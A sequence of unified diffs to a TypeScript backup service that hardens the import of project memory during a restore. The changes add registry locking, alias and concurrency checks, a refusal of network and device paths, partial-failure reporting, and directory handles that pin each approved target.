-      // Once registration resolves the project identity, failures report that path: it is
-      // where any partially written memory actually lives.
-      let registeredPath: string | null = null;
-      const failed = (
-        message: string,
-        progress: { written: string[]; skipped: string[] } = { written: [], skipped: [] }
-      ): BackupProjectImportResult => ({
+    const registrar = this.projectRegistrar;
+    if (registrar === null) {
+      return planned.map(({ candidate, targetPath }) => ({
         sourcePath: candidate.sourcePath,
-        targetPath: registeredPath ?? targetPath,
+        targetPath,
         name: candidate.name,
         status: "failed",
-        message,
-        writtenFiles: progress.written,
-        skippedFiles: progress.skipped,
-      });
-      const unchecked = (registered: string): BackupProjectImportResult =>
-        failed(
-          `'${targetPath}' is now registered as '${registered}', which this import was not checked against; approve it again`
-        );
-      try {
-        if (this.projectRegistrar === null) {
-          results.push(failed("Project registration is unavailable"));
-          continue;
-        }
-        // Re-verify under the local payload lock: the preflight ran before the snapshot and
-        // the directory may have vanished since.
-        const stat = await fs.lstat(targetPath).catch(() => null);
-        if (!stat?.isDirectory()) {
-          results.push(failed(`'${targetPath}' is not an existing directory`));
-          continue;
-        }
-        // An alias of an already registered project imports into that project without a
-        // second registration; create() would otherwise register the alias as a duplicate
-        // when its own duplicate check misses the aliased key.
-        const registeredIdentity = this.resolveRegisteredProjectPath(
-          targetPath,
-          await realpathOrNull(targetPath),
-          registry
-        );
-        // Checked before create() so a refused candidate leaves no registration behind.
-        if ((registeredIdentity ?? targetPath) !== preflightedPath) {
-          results.push(unchecked(registeredIdentity ?? targetPath));
-          continue;
-        }
-        // The backed-up name travels with a newly registered project (in the same config
-        // write as the registration); an already registered target keeps its local name.
-        const created =
-          registeredIdentity === null
-            ? await this.projectRegistrar.create(
-                targetPath,
-                candidate.name === getProjectDisplayName(targetPath)
-                  ? undefined
-                  : { displayName: candidate.name }
-              )
-            : Err("Project already exists");
-        if (created.success) {
-          registeredPath = created.data.normalizedPath;
-        } else if (created.error === "Project already exists") {
-          // Registered while this loop ran (a concurrent registration): resolve against a
-          // lookup fresher than the one built above.
-          registeredPath =
-            registeredIdentity ??
-            this.resolveRegisteredProjectPath(
-              targetPath,
-              await realpathOrNull(targetPath),
-              await this.registeredProjectLookup()
-            );
-          if (registeredPath === null) {
-            results.push(failed(`'${targetPath}' is already registered under a different path`));
-            continue;
-          }
-          if (registeredPath !== preflightedPath) {
-            results.push(unchecked(registeredPath));
-            continue;
-          }
-        } else {
-          results.push(failed(created.error));
-          continue;
-        }
-        const written = await importer.importProjectMemory({
-          token: candidate.token,
-          targetPath: registeredPath,
-        });
-        results.push({
-          sourcePath: candidate.sourcePath,
-          targetPath: registeredPath,
-          name: candidate.name,
-          status: "imported",
-          writtenFiles: written.writtenFiles,
-          skippedFiles: written.skippedFiles,
-        });
-      } catch (error) {
-        // A write that failed midway already created files; the result must list them or
-        // the user has nothing to clean up by.
-        results.push(
-          error instanceof ProjectMemoryWriteError
-            ? failed(error.message, error)
-            : failed(error instanceof Error ? error.message : String(error))
-        );
-      }
+        message: "Project registration is unavailable",
+        writtenFiles: [],
+        skippedFiles: [],
+      }));
     }
-    return results;
+    // One registration window for the imports: registration is re-read inside it — so a
+    // target unregistered since planning is registered again rather than written into on a
+    // stale identity, and one registered meanwhile through another symlinked spelling is
+    // detected instead of registered twice — and nothing can be registered or removed
+    // between that read and the memory writes, so the project an import wrote into is the
+    // project registered when it reports success.
+    return registrar.withRegistrationLock(async (locked) => {
+      const registry = await this.registeredProjectLookup();
+      for (const { candidate, targetPath, registeredPath: plannedRegisteredPath } of planned) {
+        // The identity the preflight checked (memory limits, non-file destinations,
+        // permissions) is the only one this import may write to. A different identity now —
+        // the checkout registered under another alias since planning — names a memory scope
+        // nothing has checked, so the candidate fails without a write and stays on offer;
+        // the next preview resolves the new registration and preflights it.
+        const preflightedPath = plannedRegisteredPath ?? targetPath;
+        // Once registration resolves the project identity, failures report that path: it is
+        // where any partially written memory actually lives.
+        let registeredPath: string | null = null;
+        const failed = (
+          message: string,
+          progress: { written: string[]; skipped: string[] } = { written: [], skipped: [] }
+        ): BackupProjectImportResult => ({
+          sourcePath: candidate.sourcePath,
+          targetPath: registeredPath ?? targetPath,
+          name: candidate.name,
+          status: "failed",
+          message,
+          writtenFiles: progress.written,
+          skippedFiles: progress.skipped,
+        });
+        const unchecked = (registered: string): BackupProjectImportResult =>
+          failed(
+            `'${targetPath}' is now registered as '${registered}', which this import was not checked against; approve it again`
+          );
+        try {
+          // Re-verify under the local payload lock: the preflight ran before the snapshot and
+          // the directory may have vanished since.
+          const stat = await fs.lstat(targetPath).catch(() => null);
+          if (!stat?.isDirectory()) {
+            results.push(failed(`'${targetPath}' is not an existing directory`));
+            continue;
+          }
+          // An alias of an already registered project imports into that project without a
+          // second registration; create() would otherwise register the alias as a duplicate
+          // when its own duplicate check misses the aliased key.
+          const registeredIdentity = this.resolveRegisteredProjectPath(
+            targetPath,
+            await realpathOrNull(targetPath),
+            registry
+          );
+          // Checked before create() so a refused candidate leaves no registration behind.
+          if ((registeredIdentity ?? targetPath) !== preflightedPath) {
+            results.push(unchecked(registeredIdentity ?? targetPath));
+            continue;
+          }
+          // The backed-up name travels with a newly registered project (in the same config
+          // write as the registration); an already registered target keeps its local name.
+          const created =
+            registeredIdentity === null
+              ? await locked.create(
+                  targetPath,
+                  candidate.name === getProjectDisplayName(targetPath)
+                    ? undefined
+                    : { displayName: candidate.name }
+                )
+              : Err("Project already exists");
+          if (created.success) {
+            registeredPath = created.data.normalizedPath;
+          } else if (created.error === "Project already exists") {
+            // Resolved above, or registered by an earlier candidate of this very loop (the
+            // lock excludes everyone else): the lookup built inside the window predates that.
+            registeredPath =
+              registeredIdentity ??
+              this.resolveRegisteredProjectPath(
+                targetPath,
+                await realpathOrNull(targetPath),
+                await this.registeredProjectLookup()
+              );
+            if (registeredPath === null) {
+              results.push(failed(`'${targetPath}' is already registered under a different path`));
+              continue;
+            }
+            if (registeredPath !== preflightedPath) {
+              results.push(unchecked(registeredPath));
+              continue;
+            }
+          } else {
+            results.push(failed(created.error));
+            continue;
+          }
+          const written = await importer.importProjectMemory({
+            token: candidate.token,
+            targetPath: registeredPath,
+          });
+          results.push({
+            sourcePath: candidate.sourcePath,
+            targetPath: registeredPath,
+            name: candidate.name,
+            status: "imported",
+            writtenFiles: written.writtenFiles,
+            skippedFiles: written.skippedFiles,
+          });
+        } catch (error) {
+          // A write that failed midway already created files; the result must list them or
+          // the user has nothing to clean up by.
+          results.push(
+            error instanceof ProjectMemoryWriteError
+              ? failed(error.message, error)
+              : failed(error instanceof Error ? error.message : String(error))
+          );
+        }
+      }
+      return results;
+    });
   }
 
   /**

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -290,6 +290,11 @@ function toOperationError(error: unknown): BackupOperationError {
   return { code: "IO_ERROR", message: "Settings backup failed" };
 }
 
+/** `\\server\share`, `//server/share`, and `\\?\` / `\\.\` device namespaces. */
+function isNetworkOrDevicePath(targetPath: string): boolean {
+  return /^(?:\\\\|\/\/)/.test(targetPath);
+}
+
 async function realpathOrNull(target: string): Promise<string | null> {
   return fs.realpath(target).catch(() => null);
 }
@@ -724,6 +729,16 @@ export class BackupService {
       }
       byToken.delete(request.token);
       const targetPath = request.targetPath.trim();
+      // Refused before any filesystem probe: merely stat-ing a UNC or device path on
+      // Windows starts SMB authentication against whatever host it names, and a target
+      // is meant to be a local checkout in any case. Checked before the absolute-path rule
+      // so the refusal reads the same on every platform.
+      if (isNetworkOrDevicePath(targetPath)) {
+        throw new BackupServiceError(
+          "IO_ERROR",
+          `Cannot import '${candidate.name}': the target must be a local directory, not a network or device path`
+        );
+      }
       if (!path.isAbsolute(targetPath)) {
         throw new BackupServiceError(
           "IO_ERROR",

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -808,7 +808,15 @@ export class BackupService {
     planned: readonly PlannedProjectImport[]
   ): Promise<BackupProjectImportResult[]> {
     const results: BackupProjectImportResult[] = [];
-    for (const { candidate, targetPath, registeredPath: plannedRegisteredPath } of planned) {
+    if (planned.length === 0) return results;
+    // Rebuilt now rather than reused from planning: project registration is not serialized
+    // with this restore, so the registry may have changed in between. A target unregistered
+    // since must be registered again, not written into on its stale identity; one registered
+    // meanwhile — possibly through a different symlinked spelling of the same directory,
+    // which create()'s own duplicate check does not resolve — must import into that
+    // registration instead of adding a second one and splitting the project identity.
+    const registry = await this.registeredProjectLookup();
+    for (const { candidate, targetPath } of planned) {
       // Once registration resolves the project identity, failures report that path: it is
       // where any partially written memory actually lives.
       let registeredPath: string | null = null;
@@ -836,17 +844,14 @@ export class BackupService {
           results.push(failed(`'${targetPath}' is not an existing directory`));
           continue;
         }
-        // An alias of an already registered project (resolved during planning) imports into
-        // that project without a second registration; create() would otherwise register the
-        // alias as a duplicate when its own duplicate check misses the aliased key. The
-        // identity is re-read here because project registration is not serialized with this
-        // restore: a project unregistered meanwhile must be registered again, not written
-        // into as if it still existed.
-        const registeredIdentity =
-          plannedRegisteredPath !== null &&
-          this.config.loadConfigOrDefault().projects.has(plannedRegisteredPath)
-            ? plannedRegisteredPath
-            : null;
+        // An alias of an already registered project imports into that project without a
+        // second registration; create() would otherwise register the alias as a duplicate
+        // when its own duplicate check misses the aliased key.
+        const registeredIdentity = this.resolveRegisteredProjectPath(
+          targetPath,
+          await realpathOrNull(targetPath),
+          registry
+        );
         // The backed-up name travels with a newly registered project (in the same config
         // write as the registration); an already registered target keeps its local name.
         const created =
@@ -861,8 +866,8 @@ export class BackupService {
         if (created.success) {
           registeredPath = created.data.normalizedPath;
         } else if (created.error === "Project already exists") {
-          // Registered since planning (a concurrent registration): resolve against a fresh
-          // lookup, since the planning-time one predates it.
+          // Registered while this loop ran (a concurrent registration): resolve against a
+          // lookup fresher than the one built above.
           registeredPath =
             registeredIdentity ??
             this.resolveRegisteredProjectPath(
@@ -926,9 +931,9 @@ export class BackupService {
   }
 
   /**
-   * Registered project keys and their real paths, resolved once per restore: resolving
-   * them per candidate would cost registered × approved filesystem calls, and registered
-   * paths on slow mounts would make the restore look hung.
+   * Registered project keys and their real paths, resolved once per phase (planning, then
+   * import execution): resolving them per candidate would cost registered × approved
+   * filesystem calls, and registered paths on slow mounts would make the restore look hung.
    */
   private async registeredProjectLookup(): Promise<RegisteredProjectLookup> {
     const keys = new Set(this.config.loadConfigOrDefault().projects.keys());

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -900,6 +900,7 @@ export class BackupService {
         message: "Project registration is unavailable",
         writtenFiles: [],
         skippedFiles: [],
+        registered: false,
       }));
     }
     // One registration window for the imports: registration is re-read inside it — so a
@@ -925,8 +926,11 @@ export class BackupService {
         // the next preview resolves the new registration and preflights it.
         const preflightedPath = plannedRegisteredPath ?? targetPath;
         // Once registration resolves the project identity, failures report that path: it is
-        // where any partially written memory actually lives.
+        // where any partially written memory actually lives. Whether this import registered
+        // it is reported either way: a registration is the one effect the snapshot cannot
+        // undo, so the result must say when there is one to remove.
         let registeredPath: string | null = null;
+        let registered = false;
         const failed = (
           message: string,
           progress: { written: string[]; skipped: string[] } = { written: [], skipped: [] }
@@ -938,6 +942,7 @@ export class BackupService {
           message,
           writtenFiles: progress.written,
           skippedFiles: progress.skipped,
+          registered,
         });
         const unchecked = (registered: string): BackupProjectImportResult =>
           failed(
@@ -1008,6 +1013,7 @@ export class BackupService {
               : Err("Project already exists");
           if (created.success) {
             registeredPath = created.data.normalizedPath;
+            registered = true;
           } else if (created.error === "Project already exists") {
             // Resolved above, or registered by an earlier candidate of this very loop (the
             // lock excludes everyone else): the lookup built inside the window predates that.
@@ -1054,6 +1060,7 @@ export class BackupService {
             status: "imported",
             writtenFiles: written.writtenFiles,
             skippedFiles: written.skippedFiles,
+            registered,
           });
         } catch (error) {
           // A write that failed midway already created files; the result must list them or

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -28,6 +28,7 @@ import {
 import {
   BackupCommandApprovalRequiredError,
   BackupProjectImportApprovalRequiredError,
+  ProjectMemoryRestoreError,
   ProjectMemoryWriteError,
   projectMemoryRelPath,
 } from "./payload";
@@ -568,6 +569,11 @@ export class BackupService {
             projectBundleSkipped: restored.projectBundleSkipped,
           });
         } catch (error) {
+          // Memory the failed restore already overwrote is on disk; subscribers must
+          // hear about it even though the restore is being reported as failed.
+          if (error instanceof ProjectMemoryRestoreError) {
+            this.notifyProjectMemoryChanges(error.restoredProjectMemory, []);
+          }
           // Past the snapshot, the restore may have overwritten files before failing, and
           // the snapshot is the only recovery path, so the failure must carry it.
           return Err({ ...toOperationError(error), snapshotPath });

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -30,7 +30,6 @@ import {
   BackupProjectImportApprovalRequiredError,
   ProjectMemoryRestoreError,
   ProjectMemoryWriteError,
-  projectMemoryRelPath,
 } from "./payload";
 
 export interface PreparedBackupRepository {
@@ -147,7 +146,7 @@ export interface BackupProjectRegistrar {
  * external writer would leave an open memory browser showing pre-restore contents.
  */
 export interface BackupMemoryNotifier {
-  notifyExternalProjectChange(projectPath: string, relPaths: readonly string[]): void;
+  notifyExternalProjectChange(projectPath: string): void;
 }
 
 export interface BackupServiceDependencies {
@@ -579,9 +578,12 @@ export class BackupService {
             snapshotPath,
             matchedProjectPaths: validated.matchedProjectPaths,
           });
+          // Recorded before the imports: they register projects and create files the snapshot
+          // does not cover, and their per-candidate results are the user's only undo list, so
+          // nothing that can fail may run after them and discard those results.
+          await this.persistSettings(normalized, { lastRestoredCommit: remoteCommit });
           const projectImportResults = await this.executeProjectImports(repository, plannedImports);
           this.notifyProjectMemoryChanges(restored.restoredProjectMemory, projectImportResults);
-          await this.persistSettings(normalized, { lastRestoredCommit: remoteCommit });
           return Ok({
             commit: remoteCommit,
             snapshotPath,
@@ -773,21 +775,21 @@ export class BackupService {
     return null;
   }
 
+  /** One notification per project whose memory changed; failed imports' partial writes count too. */
   private notifyProjectMemoryChanges(
     restoredProjectMemory: ReadonlyArray<{ projectPath: string; files: string[] }>,
     importResults: readonly BackupProjectImportResult[]
   ): void {
     if (this.memoryNotifier === null) return;
+    const changed = new Set<string>();
     for (const { projectPath, files } of restoredProjectMemory) {
-      this.memoryNotifier.notifyExternalProjectChange(projectPath, files.map(projectMemoryRelPath));
+      if (files.length > 0) changed.add(projectPath);
     }
-    // Failed imports included: their partial writes are on disk too.
     for (const result of importResults) {
-      if (result.writtenFiles.length === 0) continue;
-      this.memoryNotifier.notifyExternalProjectChange(
-        result.targetPath,
-        result.writtenFiles.map(projectMemoryRelPath)
-      );
+      if (result.writtenFiles.length > 0) changed.add(result.targetPath);
+    }
+    for (const projectPath of changed) {
+      this.memoryNotifier.notifyExternalProjectChange(projectPath);
     }
   }
 

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -188,9 +188,15 @@ export interface BackupMemoryNotifier {
 interface RegisteredProjectLookup {
   /** Registered user projects (system entries excluded: memory is never kept for them). */
   keys: ReadonlySet<string>;
-  /** Each key's real path, or null when it could not be resolved in time. */
+  /** Each key's real path, or null when it does not resolve or could not be resolved in time. */
   canonicalByKey: ReadonlyMap<string, string | null>;
   byCanonical: ReadonlyMap<string, string>;
+  /**
+   * Keys whose real path is not known — probed past their time or not probed at all — as
+   * opposed to keys that resolve to nothing. Any of them could still be another spelling of
+   * a directory an import is about to register.
+   */
+  unresolved: ReadonlySet<string>;
 }
 
 /**
@@ -1034,6 +1040,20 @@ export class BackupService {
             results.push(unchecked(registeredIdentity ?? targetPath));
             continue;
           }
+          // No alias found is only proof of none when every registered path was resolved. A
+          // lookup left incomplete by unavailable mounts (see registeredProjectLookup) says
+          // nothing about the keys it could not probe, and registering on its word could
+          // give one directory a second project identity and split its memory. Importing
+          // into a project that did resolve is fine either way; a new registration waits for
+          // a pass that can see every key. The candidate stays on offer.
+          if (registeredIdentity === null && registry.unresolved.size > 0) {
+            results.push(
+              failed(
+                `'${targetPath}' could not be checked against ${registry.unresolved.size} registered ${registry.unresolved.size === 1 ? "project whose location" : "projects whose locations"} could not be resolved in time; it was not registered. Retry once every project's location is reachable`
+              )
+            );
+            continue;
+          }
           // Before each irreversible step: this process must still hold the registration
           // lock, or another process has judged it stale and may be registering meanwhile.
           await locked.assertStillOwned();
@@ -1168,6 +1188,7 @@ export class BackupService {
     }
     const probes = new AsyncSemaphore(REGISTRY_CANONICALIZE_CONCURRENCY);
     const deadline = Date.now() + REGISTRY_CANONICALIZE_DEADLINE_MS;
+    const unresolved = new Set<string>();
     let unprobed = pending.length;
     let stalled = 0;
     await Promise.all(
@@ -1184,8 +1205,16 @@ export class BackupService {
               ? Math.ceil((deadline - Date.now()) / unprobed)
               : 0;
           unprobed -= 1;
+          if (budget <= 0) {
+            unresolved.add(key);
+            canonicalByKey.set(key, null);
+            return;
+          }
           const probe = await realpathWithin(key, budget);
-          if (probe.stalled) stalled += 1;
+          if (probe.stalled) {
+            stalled += 1;
+            unresolved.add(key);
+          }
           canonicalByKey.set(key, probe.canonical);
         } finally {
           slot.release();
@@ -1198,7 +1227,7 @@ export class BackupService {
       const canonical = canonicalByKey.get(key);
       if (canonical != null && !byCanonical.has(canonical)) byCanonical.set(canonical, key);
     }
-    return { keys, canonicalByKey, byCanonical };
+    return { keys, canonicalByKey, byCanonical, unresolved };
   }
 
   /** One notification per project whose memory changed; failed imports' partial writes count too. */

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -220,7 +220,14 @@ const REGISTRY_MAX_STALLED_PROBES = 2;
 interface PlannedProjectImport {
   candidate: BackupProjectImport;
   targetPath: string;
-  targetIdentity: { dev: number; ino: number };
+  /**
+   * A handle on the approved directory, held open until the import is done (restore() closes
+   * it). Execution accepts only the directory whose device and inode match this handle's;
+   * comparing against numbers recorded at approval would not do, since a directory deleted
+   * and recreated at the path meanwhile can be given the same inode number back — but not
+   * while a handle keeps that inode allocated.
+   */
+  target: fs.FileHandle;
   registeredPath: string | null;
   /**
    * Whether the candidate's recorded source path was already registered when it was offered.
@@ -362,6 +369,11 @@ function isNetworkOrDevicePath(targetPath: string): boolean {
 
 async function realpathOrNull(target: string): Promise<string | null> {
   return fs.realpath(target).catch(() => null);
+}
+
+/** Releases the directory handles a plan holds (see PlannedProjectImport.target). */
+async function closeProjectImportTargets(planned: readonly PlannedProjectImport[]): Promise<void> {
+  await Promise.all(planned.map((imported) => imported.target.close().catch(() => undefined)));
 }
 
 /**
@@ -707,100 +719,106 @@ export class BackupService {
           validated.matchedProjects,
           includeProjects
         );
-        // The bundle is read once for every approved import, and each import's write-side
-        // refusals run now: an import that cannot land must fail while nothing has changed
-        // yet, not after the core restore and its project registration.
-        const importer =
-          plannedImports.length === 0
-            ? null
-            : await this.dependencies.payload.prepareProjectImports({
-                repositoryRoot: repository.rootDir,
-                managedPath: repository.managedPath,
-              });
-        for (const planned of plannedImports) {
-          await importer?.assertProjectMemoryAllowed({
-            token: planned.candidate.token,
-            // Against the identity the import will actually write to: a target that is an
-            // alias of an already registered project imports into that project.
-            targetPath: planned.registeredPath ?? planned.targetPath,
-          });
-        }
-        const plannedTokens = new Set(plannedImports.map((planned) => planned.candidate.token));
-        const unapprovedProjectImports = validated.projectImports.filter(
-          (candidate) => !plannedTokens.has(candidate.token)
-        );
-        const snapshotPath = await this.createSnapshotPath();
+        // The plan holds a handle per approved target from here until the imports are done
+        // (see PlannedProjectImport.target), released however this ends.
         try {
-          await this.dependencies.payload.writeSafetySnapshot(snapshotPath);
-        } catch (error) {
-          // Nothing has been restored yet, so a snapshot that did not finish is an empty or
-          // partial unredacted copy that no recovery can use, and every retry would add one.
-          await fs.rm(snapshotPath, { recursive: true, force: true });
-          throw error;
-        }
-        try {
-          const restored = await this.dependencies.payload.restore({
-            repositoryRoot: repository.rootDir,
-            managedPath: repository.managedPath,
-            approvedCommandTokens,
-            includeProjects,
-            snapshotPath,
-            matchedProjects: validated.matchedProjects,
-          });
-          // Announced as soon as the memory is on disk: a failure recording the commit below
-          // must not leave subscribers showing pre-restore contents.
-          this.notifyProjectMemoryChanges(restored.restoredProjectMemory, []);
-          // Recorded before the imports: they register projects and create files the snapshot
-          // does not cover, and their per-candidate results are the user's only undo list, so
-          // nothing that can fail may run after them and discard those results.
-          await this.persistSettings(normalized, { lastRestoredCommit: remoteCommit });
-          const { results: projectImportResults, reclassified } =
-            importer === null
-              ? { results: [], reclassified: new Set<string>() }
-              : await this.executeProjectImports(importer, plannedImports, registry);
-          this.notifyProjectMemoryChanges([], projectImportResults);
-          // A candidate whose import failed per-candidate, or landed only partly because
-          // existing files conflicted, stays on offer so the user can fix the target or the
-          // conflicts and retry without another preview; its token is still current, and a
-          // conflicted import records no origin, so the source is still an import candidate.
-          // Not one whose source became a registered project here: only a new preview can
-          // present it, as a matched entry, so offering it again would only fail.
-          const stillOfferedTokens = new Set(
-            projectImportResults.flatMap((result, index) => {
-              const token = plannedImports[index]?.candidate.token;
-              if (token === undefined || reclassified.has(token)) return [];
-              return result.status === "failed" || result.skippedFiles.length > 0 ? [token] : [];
-            })
-          );
-          return Ok({
-            commit: remoteCommit,
-            snapshotPath,
-            changedFiles: restored.changedFiles,
-            localOnlyFiles: restored.localOnlyFiles,
-            projectImportResults,
-            projectBundleSkipped: restored.projectBundleSkipped,
-            unapprovedProjectImports: [
-              ...unapprovedProjectImports,
-              ...validated.projectImports.filter((candidate) =>
-                stillOfferedTokens.has(candidate.token)
-              ),
-            ],
-          });
-        } catch (error) {
-          // Memory the failed restore already overwrote is on disk; subscribers must
-          // hear about it even though the restore is being reported as failed.
-          if (error instanceof ProjectMemoryRestoreError) {
-            this.notifyProjectMemoryChanges(error.restoredProjectMemory, []);
+          // The bundle is read once for every approved import, and each import's write-side
+          // refusals run now: an import that cannot land must fail while nothing has changed
+          // yet, not after the core restore and its project registration.
+          const importer =
+            plannedImports.length === 0
+              ? null
+              : await this.dependencies.payload.prepareProjectImports({
+                  repositoryRoot: repository.rootDir,
+                  managedPath: repository.managedPath,
+                });
+          for (const planned of plannedImports) {
+            await importer?.assertProjectMemoryAllowed({
+              token: planned.candidate.token,
+              // Against the identity the import will actually write to: a target that is an
+              // alias of an already registered project imports into that project.
+              targetPath: planned.registeredPath ?? planned.targetPath,
+            });
           }
-          // Past the snapshot, the restore may have overwritten files before failing, and
-          // the snapshot is the only recovery path, so the failure must carry it.
-          return Err({ ...toOperationError(error), snapshotPath });
+          const plannedTokens = new Set(plannedImports.map((planned) => planned.candidate.token));
+          const unapprovedProjectImports = validated.projectImports.filter(
+            (candidate) => !plannedTokens.has(candidate.token)
+          );
+          const snapshotPath = await this.createSnapshotPath();
+          try {
+            await this.dependencies.payload.writeSafetySnapshot(snapshotPath);
+          } catch (error) {
+            // Nothing has been restored yet, so a snapshot that did not finish is an empty or
+            // partial unredacted copy that no recovery can use, and every retry would add one.
+            await fs.rm(snapshotPath, { recursive: true, force: true });
+            throw error;
+          }
+          try {
+            const restored = await this.dependencies.payload.restore({
+              repositoryRoot: repository.rootDir,
+              managedPath: repository.managedPath,
+              approvedCommandTokens,
+              includeProjects,
+              snapshotPath,
+              matchedProjects: validated.matchedProjects,
+            });
+            // Announced as soon as the memory is on disk: a failure recording the commit below
+            // must not leave subscribers showing pre-restore contents.
+            this.notifyProjectMemoryChanges(restored.restoredProjectMemory, []);
+            // Recorded before the imports: they register projects and create files the snapshot
+            // does not cover, and their per-candidate results are the user's only undo list, so
+            // nothing that can fail may run after them and discard those results.
+            await this.persistSettings(normalized, { lastRestoredCommit: remoteCommit });
+            const { results: projectImportResults, reclassified } =
+              importer === null
+                ? { results: [], reclassified: new Set<string>() }
+                : await this.executeProjectImports(importer, plannedImports, registry);
+            this.notifyProjectMemoryChanges([], projectImportResults);
+            // A candidate whose import failed per-candidate, or landed only partly because
+            // existing files conflicted, stays on offer so the user can fix the target or the
+            // conflicts and retry without another preview; its token is still current, and a
+            // conflicted import records no origin, so the source is still an import candidate.
+            // Not one whose source became a registered project here: only a new preview can
+            // present it, as a matched entry, so offering it again would only fail.
+            const stillOfferedTokens = new Set(
+              projectImportResults.flatMap((result, index) => {
+                const token = plannedImports[index]?.candidate.token;
+                if (token === undefined || reclassified.has(token)) return [];
+                return result.status === "failed" || result.skippedFiles.length > 0 ? [token] : [];
+              })
+            );
+            return Ok({
+              commit: remoteCommit,
+              snapshotPath,
+              changedFiles: restored.changedFiles,
+              localOnlyFiles: restored.localOnlyFiles,
+              projectImportResults,
+              projectBundleSkipped: restored.projectBundleSkipped,
+              unapprovedProjectImports: [
+                ...unapprovedProjectImports,
+                ...validated.projectImports.filter((candidate) =>
+                  stillOfferedTokens.has(candidate.token)
+                ),
+              ],
+            });
+          } catch (error) {
+            // Memory the failed restore already overwrote is on disk; subscribers must
+            // hear about it even though the restore is being reported as failed.
+            if (error instanceof ProjectMemoryRestoreError) {
+              this.notifyProjectMemoryChanges(error.restoredProjectMemory, []);
+            }
+            // Past the snapshot, the restore may have overwritten files before failing, and
+            // the snapshot is the only recovery path, so the failure must carry it.
+            return Err({ ...toOperationError(error), snapshotPath });
+          } finally {
+            // Released only now, because until this restore returns its snapshot is the recovery
+            // point it may still hand back. Reaping is safe here rather than gated on other
+            // restores because the local payload lock already excludes them.
+            await releaseSnapshot(snapshotPath);
+            await this.reapOldSnapshots(path.dirname(snapshotPath), snapshotPath);
+          }
         } finally {
-          // Released only now, because until this restore returns its snapshot is the recovery
-          // point it may still hand back. Reaping is safe here rather than gated on other
-          // restores because the local payload lock already excludes them.
-          await releaseSnapshot(snapshotPath);
-          await this.reapOldSnapshots(path.dirname(snapshotPath), snapshotPath);
+          await closeProjectImportTargets(plannedImports);
         }
       });
     });
@@ -832,7 +850,39 @@ export class BackupService {
     const matchedProjectPaths = new Set(matched.map((match) => match.projectPath));
     // Every source path the bundle records, whichever entry recorded it.
     const recordedSources = new Set([...candidates, ...matched].map((entry) => entry.sourcePath));
-    for (const request of requested) {
+    try {
+      for (const request of requested) {
+        planned.push(
+          await this.planProjectImport(request, byToken, registry, {
+            claimedTargets,
+            matchedProjectPaths,
+            recordedSources,
+            candidates,
+          })
+        );
+      }
+    } catch (error) {
+      // A refused request refuses the whole restore; the handles opened for the requests
+      // before it would otherwise stay open.
+      await closeProjectImportTargets(planned);
+      throw error;
+    }
+    return { imports: planned, registry };
+  }
+
+  private async planProjectImport(
+    request: { token: string; targetPath: string },
+    byToken: Map<string, BackupProjectImport>,
+    registry: RegisteredProjectLookup,
+    run: {
+      claimedTargets: Set<string>;
+      matchedProjectPaths: ReadonlySet<string>;
+      recordedSources: ReadonlySet<string>;
+      candidates: readonly BackupProjectImport[];
+    }
+  ): Promise<PlannedProjectImport> {
+    const { claimedTargets, matchedProjectPaths, recordedSources, candidates } = run;
+    {
       const candidate = byToken.get(request.token);
       // Unknown and stale tokens are indistinguishable here; both mean the user approved
       // something other than what the repository currently holds.
@@ -876,53 +926,66 @@ export class BackupService {
           `Cannot import '${candidate.name}': '${resolved}' is not an existing directory`
         );
       }
-      // Claimed by real path: two lexically different targets that reach one directory
-      // through a symlinked parent would otherwise both register/resolve to the same
-      // project and merge two backed-up projects' memories into it.
-      const canonical = (await realpathOrNull(resolved)) ?? resolved;
-      if (claimedTargets.has(canonical)) {
-        throw new BackupServiceError(
-          "IO_ERROR",
-          `Cannot import '${candidate.name}': another import already targets '${resolved}'`
-        );
-      }
-      claimedTargets.add(canonical);
-      // Known up front when the target is already registered (directly or as an alias),
-      // so the preflight checks the memory scope the import will really write to.
-      const registeredPath = this.resolveRegisteredProjectPath(resolved, canonical, registry);
-      // A project that a matched entry restores into in this same run cannot also take an
-      // import: the two would merge into one memory scope and the import's origin marker
-      // would displace the matched entry's identity.
-      if (matchedProjectPaths.has(registeredPath ?? resolved)) {
-        throw new BackupServiceError(
-          "IO_ERROR",
-          `Cannot import '${candidate.name}': '${resolved}' already receives a backed-up project's memory in this restore`
-        );
-      }
-      // Nor a directory at another backed-up project's recorded path: registering it would
-      // make every later restore match that other entry there directly, by exact path — over
-      // an origin record and ahead of anywhere its memory was imported — so the other entry's
-      // notes would be written into this candidate's scope. Its own recorded path is fine:
-      // that is the entry being restored where it came from.
-      for (const spelling of new Set([resolved, canonical, registeredPath ?? resolved])) {
-        if (recordedSources.has(spelling) && spelling !== candidate.sourcePath) {
+      // The directory itself, pinned (see PlannedProjectImport.target): opened after the
+      // checks above, and confirmed to be the very directory they checked, since the path
+      // could have been re-pointed in between.
+      const target = await fs.open(resolved, "r");
+      try {
+        const opened = await target.stat();
+        if (opened.dev !== stat.dev || opened.ino !== stat.ino) {
           throw new BackupServiceError(
             "IO_ERROR",
-            `Cannot import '${candidate.name}': '${resolved}' is the recorded path of another backed-up project`
+            `Cannot import '${candidate.name}': '${resolved}' changed while it was being checked`
           );
         }
+        // Claimed by real path: two lexically different targets that reach one directory
+        // through a symlinked parent would otherwise both register/resolve to the same
+        // project and merge two backed-up projects' memories into it.
+        const canonical = (await realpathOrNull(resolved)) ?? resolved;
+        if (claimedTargets.has(canonical)) {
+          throw new BackupServiceError(
+            "IO_ERROR",
+            `Cannot import '${candidate.name}': another import already targets '${resolved}'`
+          );
+        }
+        claimedTargets.add(canonical);
+        // Known up front when the target is already registered (directly or as an alias),
+        // so the preflight checks the memory scope the import will really write to.
+        const registeredPath = this.resolveRegisteredProjectPath(resolved, canonical, registry);
+        // A project that a matched entry restores into in this same run cannot also take an
+        // import: the two would merge into one memory scope and the import's origin marker
+        // would displace the matched entry's identity.
+        if (matchedProjectPaths.has(registeredPath ?? resolved)) {
+          throw new BackupServiceError(
+            "IO_ERROR",
